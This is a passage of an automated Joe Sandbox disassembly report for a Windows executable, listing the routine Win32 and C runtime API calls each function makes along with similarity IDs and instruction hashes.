                                                          • API ID: ErrorLast$FileHandleRead
                                                          • String ID:
                                                          • API String ID: 2244327787-0
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00FD3F73,00000000,00000000,?,00FDACDB,00FD3F73,00000000,00000000,00000000,?,00FDAED8,00000006,FlsSetValue), ref: 00FDAD66
                                                          • GetLastError.KERNEL32(?,00FDACDB,00FD3F73,00000000,00000000,00000000,?,00FDAED8,00000006,FlsSetValue,00FE7970,FlsSetValue,00000000,00000364,?,00FD98B7), ref: 00FDAD72
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FDACDB,00FD3F73,00000000,00000000,00000000,?,00FDAED8,00000006,FlsSetValue,00FE7970,FlsSetValue,00000000), ref: 00FDAD80
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00FBD343,00000001,?,?,?,00000000,00FC551D,?,?,?), ref: 00FB9F9E
                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00FC551D,?,?,?,?,?,00FC4FC7,?), ref: 00FB9FE5
                                                          • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00FBD343,00000001,?,?), ref: 00FBA011
                                                          Similarity
                                                          • API ID: FileWrite$Handle
                                                          • String ID:
                                                          • API String ID: 4209713984-0
                                                          APIs
                                                            • Part of subcall function 00FBC27E: _wcslen.LIBCMT ref: 00FBC284
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA2D9
                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA30C
                                                          • GetLastError.KERNEL32(?,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA329
                                                          Similarity
                                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                                          • String ID:
                                                          • API String ID: 2260680371-0
                                                          APIs
                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00FDB8B8
                                                          Strings
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID:
                                                          • API String ID: 1807457897-3916222277
                                                          APIs
                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00FDAFDD
                                                          Strings
                                                          Similarity
                                                          • API ID: String
                                                          • String ID: LCMapStringEx
                                                          • API String ID: 2568140703-3893581201
                                                          APIs
                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00FDA56F), ref: 00FDAF55
                                                          Strings
                                                          Similarity
                                                          • API ID: CountCriticalInitializeSectionSpin
                                                          • String ID: InitializeCriticalSectionEx
                                                          • API String ID: 2593887523-3084827643
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Alloc
                                                          • String ID: FlsAlloc
                                                          • API String ID: 2773662609-671089009
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCEAF9
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Strings
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID: 3To
                                                          • API String ID: 1269201914-245939750
                                                          APIs
                                                            • Part of subcall function 00FDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00FDBA44,?), ref: 00FDB7E6
                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00FDBA89,?,00000000), ref: 00FDBC64
                                                          • GetCPInfo.KERNEL32(00000000,00FDBA89,?,?,?,00FDBA89,?,00000000), ref: 00FDBC77
                                                          Similarity
                                                          • API ID: CodeInfoPageValid
                                                          • String ID:
                                                          • API String ID: 546120528-0
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00FB9A50,?,?,00000000,?,?,00FB8CBC,?), ref: 00FB9BAB
                                                          • GetLastError.KERNEL32(?,00000000,00FB8411,-00009570,00000000,000007F3), ref: 00FB9BB6
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer
                                                          • String ID:
                                                          • API String ID: 2976181284-0
                                                          APIs
                                                            • Part of subcall function 00FD97E5: GetLastError.KERNEL32(?,00FF1030,00FD4674,00FF1030,?,?,00FD3F73,00000050,?,00FF1030,00000200), ref: 00FD97E9
                                                            • Part of subcall function 00FD97E5: _free.LIBCMT ref: 00FD981C
                                                            • Part of subcall function 00FD97E5: SetLastError.KERNEL32(00000000,?,00FF1030,00000200), ref: 00FD985D
                                                            • Part of subcall function 00FD97E5: _abort.LIBCMT ref: 00FD9863
                                                            • Part of subcall function 00FDBB4E: _abort.LIBCMT ref: 00FDBB80
                                                            • Part of subcall function 00FDBB4E: _free.LIBCMT ref: 00FDBBB4
                                                            • Part of subcall function 00FDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00FDBA44,?), ref: 00FDB7E6
                                                          • _free.LIBCMT ref: 00FDBA9F
                                                          • _free.LIBCMT ref: 00FDBAD5
                                                          Similarity
                                                          • API ID: _free$ErrorLast_abort
                                                          • String ID:
                                                          • API String ID: 2991157371-0
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB1E55
                                                            • Part of subcall function 00FB3BBA: __EH_prolog.LIBCMT ref: 00FB3BBF
                                                          • _wcslen.LIBCMT ref: 00FB1EFD
                                                          Similarity
                                                          • API ID: H_prolog$_wcslen
                                                          • String ID:
                                                          • API String ID: 2838827086-0
                                                          APIs
                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FB73BC,?,?,?,00000000), ref: 00FB9DBC
                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00FB9E70
                                                          Similarity
                                                          • API ID: File$BuffersFlushTime
                                                          • String ID:
                                                          • API String ID: 1392018926-0
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00FB9F27,?,?,00FB771A), ref: 00FB96E6
                                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00FB9F27,?,?,00FB771A), ref: 00FB9716
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00FB9EC7
                                                          • GetLastError.KERNEL32 ref: 00FB9ED4
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer
                                                          • String ID:
                                                          • API String ID: 2976181284-0
                                                          APIs
                                                          • _free.LIBCMT ref: 00FD8E75
                                                            • Part of subcall function 00FD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FDCA2C,00000000,?,00FD6CBE,?,00000008,?,00FD91E0,?,?,?), ref: 00FD8E38
                                                          • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00FF1098,00FB17CE,?,?,00000007,?,?,?,00FB13D6,?,00000000), ref: 00FD8EB1
                                                          Similarity
                                                          • API ID: Heap$AllocAllocate_free
                                                          • String ID:
                                                          • API String ID: 2447670028-0
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 00FC10AB
                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00FC10B2
                                                          Similarity
                                                          • API ID: Process$AffinityCurrentMask
                                                          • String ID:
                                                          • API String ID: 1231390398-0
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA501
                                                            • Part of subcall function 00FBBB03: _wcslen.LIBCMT ref: 00FBBB27
                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA532
                                                          Similarity
                                                          • API ID: AttributesFile$_wcslen
                                                          • String ID:
                                                          • API String ID: 2673547680-0
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(000000FF,?,?,00FB977F,?,?,00FB95CF,?,?,?,?,?,00FE2641,000000FF), ref: 00FBA1F1
                                                            • Part of subcall function 00FBBB03: _wcslen.LIBCMT ref: 00FBBB27
                                                          • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FB977F,?,?,00FB95CF,?,?,?,?,?,00FE2641), ref: 00FBA21F
                                                          Similarity
                                                          • API ID: DeleteFile$_wcslen
                                                          • String ID:
                                                          • API String ID: 2643169976-0
                                                          APIs
                                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,00FE2641,000000FF), ref: 00FCACB0
                                                          • OleUninitialize.OLE32(?,?,?,?,00FE2641,000000FF), ref: 00FCACB5
                                                          Similarity
                                                          • API ID: GdiplusShutdownUninitialize
                                                          • String ID:
                                                          • API String ID: 3856339756-0
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00FBA23A,?,00FB755C,?,?,?,?), ref: 00FBA254
                                                            • Part of subcall function 00FBBB03: _wcslen.LIBCMT ref: 00FBBB27
                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00FBA23A,?,00FB755C,?,?,?,?), ref: 00FBA280
                                                          Similarity
                                                          • API ID: AttributesFile$_wcslen
                                                          • String ID:
                                                          • API String ID: 2673547680-0
                                                          APIs
                                                          • _swprintf.LIBCMT ref: 00FCDEEC
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          • SetDlgItemTextW.USER32(00000065,?), ref: 00FCDF03
                                                            • Part of subcall function 00FCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FCB579
                                                            • Part of subcall function 00FCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCB58A
                                                            • Part of subcall function 00FCB568: IsDialogMessageW.USER32(00010444,?), ref: 00FCB59E
                                                            • Part of subcall function 00FCB568: TranslateMessage.USER32(?), ref: 00FCB5AC
                                                            • Part of subcall function 00FCB568: DispatchMessageW.USER32(?), ref: 00FCB5B6
                                                          Similarity
                                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                          • String ID:
                                                          • API String ID: 2718869927-0
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FC0836
                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FBF2D8,Crypt32.dll,00000000,00FBF35C,?,?,00FBF33E,?,?,?), ref: 00FC0858
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystem
                                                          • String ID:
                                                          • API String ID: 1175261203-0
                                                          APIs
                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FCA3DA
                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00FCA3E1
                                                          Similarity
                                                          • API ID: BitmapCreateFromGdipStream
                                                          • String ID:
                                                          • API String ID: 1918208029-0
                                                          APIs
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD2BAA
                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00FD2BB5
                                                          Similarity
                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                          • String ID:
                                                          • API String ID: 1660781231-0
                                                          • Opcode ID: 63126868f4a2d5642a24ca76696b14cda0ac3938e90c36ffaeb48fdf122396a6
                                                          • Instruction ID: 65e6b4c52e75a5a1abb263d6ab01d5295efcc8962aecbeda8ae831001e368086
                                                          • Opcode Fuzzy Hash: 63126868f4a2d5642a24ca76696b14cda0ac3938e90c36ffaeb48fdf122396a6
                                                          • Instruction Fuzzy Hash: 38D0A935A68204184D946A702C025583387AEF2B707BC178BF0208A7C2EED88040B0A2
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ItemShowWindow
                                                          • String ID:
                                                          • API String ID: 3351165006-0
                                                          • Opcode ID: d3601f797b8cf2c3cc3f6fb357c663e466d3985990fd6bad338436d3447e9893
                                                          • Instruction ID: 6a7c44cb556bb76724dbfd9303e6790f853673d2b54ef490bc5bdc9724778941
                                                          • Opcode Fuzzy Hash: d3601f797b8cf2c3cc3f6fb357c663e466d3985990fd6bad338436d3447e9893
                                                          • Instruction Fuzzy Hash: B5C012B245C200BECB010BB4DC0AC2BBBB8BBA5322F04C908B0E5C0054C23EC010DB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 9123b9ed4ae9bc4db2ad5e18097dda46491c9f8727d2336840863a6959cf7505
                                                          • Instruction ID: 514df1c6f5f83e43c4c087d8457ae2489b00efb44a41c398dcbb1bfd062b0975
                                                          • Opcode Fuzzy Hash: 9123b9ed4ae9bc4db2ad5e18097dda46491c9f8727d2336840863a6959cf7505
                                                          • Instruction Fuzzy Hash: BEC1C070E002549BEF14CF29C8A8BF97BA5BF49320F5841B9EC459F286DB349944EF61
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: d38504932629dc742d23c1a6115d6d2f681320ea5b86219d0a65ea5a1135cc13
                                                          • Instruction ID: 02da6e56702becb58c75b6cbb3722882f4a9bf8da9438f4e66946f26d512f37d
                                                          • Opcode Fuzzy Hash: d38504932629dc742d23c1a6115d6d2f681320ea5b86219d0a65ea5a1135cc13
                                                          • Instruction Fuzzy Hash: 0E710671540B459ECB35DB71CC51AE7B7E9AF14300F40092EF1AB83242EA367648EF11
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB8289
                                                            • Part of subcall function 00FB13DC: __EH_prolog.LIBCMT ref: 00FB13E1
                                                            • Part of subcall function 00FBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FBA598
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$CloseFind
                                                          • String ID:
                                                          • API String ID: 2506663941-0
                                                          • Opcode ID: a2b76208f34996ffecbc22f86eab349677401000b3a7c1ed20d195610a2c6af0
                                                          • Instruction ID: 847a0141f58d7e863828dc227156554b9bfdde012110f560d59b5ea8b7144484
                                                          • Opcode Fuzzy Hash: a2b76208f34996ffecbc22f86eab349677401000b3a7c1ed20d195610a2c6af0
                                                          • Instruction Fuzzy Hash: AB41C971D446589ADB20EB62CC55BEAB7ACBF40344F4804EAE14A97083EB785FC5EF10
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB13E1
                                                            • Part of subcall function 00FB5E37: __EH_prolog.LIBCMT ref: 00FB5E3C
                                                            • Part of subcall function 00FBCE40: __EH_prolog.LIBCMT ref: 00FBCE45
                                                            • Part of subcall function 00FBB505: __EH_prolog.LIBCMT ref: 00FBB50A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: cac7179910b0fc170d9d7a294c8459fd0ffa84f5b84e51c3978c218567637d74
                                                          • Instruction ID: 5ed7d40e3782d6d61d1fc1cbfe63875bc0da34213587e93b6105d25810109da7
                                                          • Opcode Fuzzy Hash: cac7179910b0fc170d9d7a294c8459fd0ffa84f5b84e51c3978c218567637d74
                                                          • Instruction Fuzzy Hash: E34169B0905B41DEE724CF3A8885AE6FAE5BB19310F50492ED5FE83282CB356654DB10
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB13E1
                                                            • Part of subcall function 00FB5E37: __EH_prolog.LIBCMT ref: 00FB5E3C
                                                            • Part of subcall function 00FBCE40: __EH_prolog.LIBCMT ref: 00FBCE45
                                                            • Part of subcall function 00FBB505: __EH_prolog.LIBCMT ref: 00FBB50A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: b37015569c5f6d8885f52281e75c7f99dace36868b418484ed1128595c9d917f
                                                          • Instruction ID: 4eca5e5014d8b85795109483c35cf14b273c717165a455c7efe794fd957af0c3
                                                          • Opcode Fuzzy Hash: b37015569c5f6d8885f52281e75c7f99dace36868b418484ed1128595c9d917f
                                                          • Instruction Fuzzy Hash: 344177B0905B40DEE724CF3A8885AE6FBE5BF19310F404A2ED5FE83282CB356654DB10
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FCB098
                                                            • Part of subcall function 00FB13DC: __EH_prolog.LIBCMT ref: 00FB13E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 775d30f5c0677d7816efd4629145db097d54a148bc86c0a4dbab1205e7db0f07
                                                          • Instruction ID: 15113fb3b4622fdee458dfbe921b2cd89a2e5f71a153542919dfc82cfe79c531
                                                          • Opcode Fuzzy Hash: 775d30f5c0677d7816efd4629145db097d54a148bc86c0a4dbab1205e7db0f07
                                                          • Instruction Fuzzy Hash: 3C318F75D0024ADECF15DFA5CD52AEEB7B4AF09300F54449EE409B7242D739AE04EB61
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00FDACF8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID:
                                                          • API String ID: 190572456-0
                                                          • Opcode ID: a22b01b74d5a05ed5096dc9b78850612f1daa544e4673bd6fa096b5bc3dae6a6
                                                          • Instruction ID: f19a946f9d8a8e655627f2a6ee5f3146dfee1ba70d923c220e541cf0220b5a31
                                                          • Opcode Fuzzy Hash: a22b01b74d5a05ed5096dc9b78850612f1daa544e4673bd6fa096b5bc3dae6a6
                                                          • Instruction Fuzzy Hash: DF11C633F116299F9B229E28EC8095A7397AB8437071E4222FD25AF354D734DC01B7D6
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 3574c1cd47d6ff1a4f9678e2ab499b68168944557c6fde24b556fa2e155bf9c6
                                                          • Instruction ID: e289031ad4783e1548d716b910267c92730360e610ec8dba3df14870a2b690f4
                                                          • Opcode Fuzzy Hash: 3574c1cd47d6ff1a4f9678e2ab499b68168944557c6fde24b556fa2e155bf9c6
                                                          • Instruction Fuzzy Hash: 2101CC33D00525ABCF11AF69CD919DEB775BF88750F054115F915B7152DA78CD00EEA0
                                                          APIs
                                                            • Part of subcall function 00FDB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FD9813,00000001,00000364,?,00FD3F73,00000050,?,00FF1030,00000200), ref: 00FDB177
                                                          • _free.LIBCMT ref: 00FDC4E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                          • Instruction ID: fe931bda7856ed89bdc602a89602612289965a0c0145df511b3052eb5d3294fd
                                                          • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                          • Instruction Fuzzy Hash: 1301DB736003066BE731CF55DC45A6AFBEEEB85370F29051EE594833C1EA30A905D764
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FD9813,00000001,00000364,?,00FD3F73,00000050,?,00FF1030,00000200), ref: 00FDB177
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
